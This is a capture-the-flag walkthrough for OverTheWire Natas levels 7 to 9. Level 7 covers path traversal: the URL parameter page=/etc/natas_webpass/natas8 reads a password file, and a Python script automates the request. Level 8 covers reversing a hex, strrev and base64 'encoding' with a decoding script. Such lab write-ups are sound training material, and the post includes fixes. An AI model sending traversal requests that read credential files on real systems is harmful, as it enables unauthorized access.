OVERTHEWIRE Natas: Walkthrough series Level 7 – 9

This article is a walkthrough for levels 7 to 9 of the OverTheWire Natas web-attack series. Visit the links below for the levels before these.

Overthewire Natas: Walkthrough Series Levels 1 – 4

Overthewire Natas: Walkthrough Series Levels 4 – 7

Let’s get on with it:

Level 7 – 8:

After logging in with the password found in the last article, we land on a page with two links, Home and About. Notice the URL each of them produces: the content shown is selected by a page parameter, for example index.php?page=home.

A quick look at the page source shows an HTML comment hinting that the password for the next level is stored in the file /etc/natas_webpass/natas8.

This challenge demonstrates the web application attack called path (directory) traversal, here in its local file inclusion form. The page parameter names a file that the server-side script reads and echoes into the response, and nothing restricts that name to the intended home and about pages. Any file the web server's user can read can therefore be requested by its absolute path, including the hinted password file:

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

The response body then contains the password for level 8.
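The same request done from a script, as an added example that is not part of the original walkthrough: it builds the traversal URL for the page parameter, sends it with HTTP basic auth (the way all natas levels authenticate), and pulls the password out of the page body. The level URL and password-file path are the ones used above; the assumptions that the included content lands inside a `<div id="content">` and that natas passwords are 32 alphanumeric characters are mine, and the sample response is constructed, with a made-up password.

```python
"""Level 7: fetch the next password through the unrestricted `page` parameter.

Added example, not part of the original walkthrough. Assumes the level 7
layout described above: index.php includes whatever file the `page` parameter
names, and the included content ends up inside <div id="content"> (a natas
page-layout detail assumed here). Network access is only needed for
fetch_password(); URL building and response parsing run offline.
"""
import base64
import re
from typing import Optional
from urllib.parse import urlencode
from urllib.request import Request, urlopen

LEVEL_URL = "http://natas7.natas.labs.overthewire.org/index.php"
PASSWORD_FILE = "/etc/natas_webpass/natas8"

# Assumption: natas passwords are 32 characters drawn from [A-Za-z0-9].
PASSWORD_RE = re.compile(r"\b[A-Za-z0-9]{32}\b")


def build_lfi_url(base_url: str, path: str) -> str:
    """Return the URL that makes the vulnerable script include `path`.

    safe="/" keeps the slashes literal so the URL reads like the one typed
    into the browser; PHP would accept %2F-encoded slashes just as well.
    """
    return base_url + "?" + urlencode({"page": path}, safe="/")


def extract_password(html: str) -> Optional[str]:
    """Pull the included file's content out of the page body."""
    m = re.search(r'<div id="content">(.*?)</div>', html, re.S)
    body = m.group(1) if m else html
    found = PASSWORD_RE.search(body)
    return found.group(0) if found else None


def fetch_password(username: str, password: str) -> Optional[str]:
    """Perform the live request with HTTP basic auth (network required)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = Request(build_lfi_url(LEVEL_URL, PASSWORD_FILE),
                  headers={"Authorization": "Basic " + token})
    with urlopen(req, timeout=10) as resp:
        return extract_password(resp.read().decode("utf-8", "replace"))


# Constructed sample response, mimicking what the server returns once the
# password file has been included (the 32-character password is made up).
SAMPLE_RESPONSE = """<html><body>
<div id="content">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br><br>
abcdefghijklmnopqrstuvwxyz012345
</div></body></html>"""

if __name__ == "__main__":
    print(build_lfi_url(LEVEL_URL, PASSWORD_FILE))
    print(extract_password(SAMPLE_RESPONSE))
```

Run the file to see the URL and the parsed sample; call fetch_password("natas7", "<level 7 password>") for the live level. The server-side fix is not to accept a path at all: map the page value against an allowlist of the two known page names and reject anything else, so neither an absolute path nor ../ sequences ever reach the include.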

Level 8 – 9:

Log in with the password you just found. The level 8 page shows a single form asking for a secret. Click "View source code" to see what actually happens when you submit it.

The relevant part of the source is PHP. It defines a variable called $encodedSecret holding a fixed hex string, and a function encodeSecret that takes the user's input, base64-encodes it, reverses the resulting string (strrev) and finally converts that to its hex representation (bin2hex).

The if condition compares encodeSecret of the submitted secret with the $encodedSecret value; on a match the page prints the password for the next level. Every step of encodeSecret is reversible, so the stored value is not a hash: anyone who can read the source recovers the secret by applying the inverse operations in reverse order.

So copy the $encodedSecret value and run it through a hex decoder (the inverse of bin2hex); the output is the base64 string in reversed form.

I used another online tool to reverse that string.

Finally, the reversed string is decoded with a base64 decoder, and the output of that decoding is the actual secret. (Pasting a challenge value into a web decoder is harmless here, but for anything real do the three inversions locally rather than handing secrets to a third-party site.)
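The three inversions above done locally, as an added example that is not code from the level or from the original walkthrough: it reimplements the PHP encodeSecret (bin2hex(strrev(base64_encode($secret)))) in Python, applies the inverse steps in reverse order, and checks the result by re-encoding it. ENCODED_SECRET is the $encodedSecret constant from the level 8 source, copied from the level rather than from this page; the intermediate values it exposes match what the online tools produce.

```python
"""Level 8: invert encodeSecret locally instead of pasting it into online tools.

Added example, not part of the level or the walkthrough. ENCODED_SECRET is the
$encodedSecret constant from the level 8 source.
"""
import base64

ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: bytes) -> str:
    """Python equivalent of the PHP encodeSecret(): base64 -> strrev -> bin2hex."""
    b64 = base64.b64encode(secret)  # base64_encode
    reversed_b64 = b64[::-1]        # strrev
    return reversed_b64.hex()       # bin2hex


def decode_steps(encoded_hex: str) -> dict:
    """Undo encodeSecret() one step at a time and return every intermediate.

    Each step of the original is a bijection, so the inversion always works;
    the 'encoding' provides no secrecy whatsoever.
    """
    reversed_b64 = bytes.fromhex(encoded_hex)          # inverse of bin2hex
    b64 = reversed_b64[::-1]                           # strrev is its own inverse
    secret = base64.b64decode(b64, validate=True)      # inverse of base64_encode
    return {
        "reversed_base64": reversed_b64.decode("ascii"),
        "base64": b64.decode("ascii"),
        "secret": secret,
    }


def decode_secret(encoded_hex: str) -> bytes:
    """Return only the recovered plaintext secret."""
    return decode_steps(encoded_hex)["secret"]


def recover(encoded_hex: str) -> str:
    """Decode, then sanity-check by re-encoding; returns the secret as text."""
    secret = decode_secret(encoded_hex)
    if encode_secret(secret) != encoded_hex.lower():
        raise ValueError("round trip failed: input was not produced by encodeSecret")
    return secret.decode("ascii")


if __name__ == "__main__":
    for name, value in decode_steps(ENCODED_SECRET).items():
        print(f"{name}: {value}")
    print("submit this in the level 8 form:", recover(ENCODED_SECRET))
```

Submitting the recovered secret in the form is the whole attack. The lesson for anyone writing such a check: a value that must survive source disclosure has to be stored as a salted password hash (password_hash/password_verify in PHP) and compared with a constant-time function, not transformed by steps that any reader can run backwards.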

Submitting that secret in the form prints the password for level 9.

This series continues in the next article, which covers the following levels. I will share the link here once it is published.
